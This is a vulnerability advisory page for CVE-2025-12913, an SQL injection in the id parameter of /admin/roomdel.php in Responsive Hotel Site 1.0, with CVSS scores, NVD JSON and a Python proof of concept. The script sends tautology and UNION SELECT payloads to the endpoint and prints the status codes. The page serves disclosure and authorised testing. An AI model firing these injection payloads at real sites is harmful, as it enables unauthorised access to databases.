Security Vulnerability Report
CVE-2025-12913 CVSS 4.7 MEDIUM

CVE-2025-12913

Published: 2025-11-08 20:15:35
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in code-projects Responsive Hotel Site 1.0. This affects an unknown part of the file /admin/roomdel.php. Manipulating the argument ID can lead to SQL injection. The attack can be launched remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L (secondary assessment, which assumes high privileges; the NVD primary CVSS 3.1 vector in the raw JSON below is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, base score 9.8 CRITICAL, so the effective severity depends on whether /admin/roomdel.php is reachable without authentication)

Configurations (Affected Products)

cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Responsive Hotel Site 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
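# CVE-2025-12913 SQL Injection PoC for Responsive Hotel Site 1.0
# Target: /admin/roomdel.php
# Vulnerability: SQL Injection via 'id' parameter
import requests
import sys

# Upper bound (seconds) on each HTTP round-trip so an unresponsive host
# cannot hang the script indefinitely.
REQUEST_TIMEOUT = 10


def _fetch_roomdel(target_url, payload, headers):
    """Issue one GET to ``/admin/roomdel.php`` with *payload* as the ``id`` value.

    Args:
        target_url: Base URL of the deployment, without a trailing slash.
        payload: Raw string placed verbatim into the ``id`` query parameter
            (no URL-encoding is applied here, as in the original script).
        headers: Request headers to send.

    Returns:
        ``(url, response)`` — the full URL that was requested and the
        ``requests.Response`` object.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    url = f"{target_url}/admin/roomdel.php?id={payload}"
    response = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT)
    return url, response


def exploit_sql_injection(target_url, cookie=None):
    """Send three probe requests to ``/admin/roomdel.php`` and report their status codes.

    Args:
        target_url: Base URL of the deployment, e.g. ``http://localhost/hotel``.
        cookie: Optional ``Cookie`` header value. The endpoint lives under
            ``/admin``, so an authenticated session is presumably required
            (the page's secondary CVSS vector records PR:H) — confirm against
            the target.

    Returns:
        dict with keys ``normal_status``, ``injection_status`` and
        ``union_status`` holding the HTTP status code of each probe.

    Note:
        Only status codes are collected and printed. A matching status code
        does not by itself confirm injection — confirming the flaw requires
        comparing response bodies, which this script does not do. On the
        server side the fix is a parameterised query for ``id``.
    """
    # Baseline request with a plausible valid id, followed by a tautology
    # and an 8-column UNION; the payload strings are those from the original
    # report.
    normal_payload = "1"
    exploit_payload = "1' AND 1=1 -- "
    union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8 -- "

    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Accept': 'text/html'
    }
    if cookie:
        headers['Cookie'] = cookie

    normal_url, response1 = _fetch_roomdel(target_url, normal_payload, headers)
    exploit_url, response2 = _fetch_roomdel(target_url, exploit_payload, headers)

    print(f"[*] Target: {target_url}")
    print(f"[*] Testing normal request: {normal_url}")
    print(f"[*] Status: {response1.status_code}")
    print(f"[*] Testing injection: {exploit_url}")
    print(f"[*] Status: {response2.status_code}")

    union_url, response3 = _fetch_roomdel(target_url, union_payload, headers)
    print(f"[*] Testing union injection: {union_url}")
    print(f"[*] Status: {response3.status_code}")

    return {
        'normal_status': response1.status_code,
        'injection_status': response2.status_code,
        'union_status': response3.status_code
    }


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12913-poc.py <target_url>")
        print("Example: python cve-2025-12913-poc.py http://localhost/hotel")
        sys.exit(1)
    target = sys.argv[1]
    exploit_sql_injection(target)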

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12913", "sourceIdentifier": "[email protected]", "published": "2025-11-08T20:15:34.580", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Responsive Hotel Site 1.0. This affects an unknown part of the file /admin/roomdel.php. Executing manipulation of the argument ID can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": 
"BEEBA52B-991B-4FF9-AE6A-14E21F1F7E50"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/HoyaAm/cve-hoya/blob/main/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.331631", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331631", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.681061", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}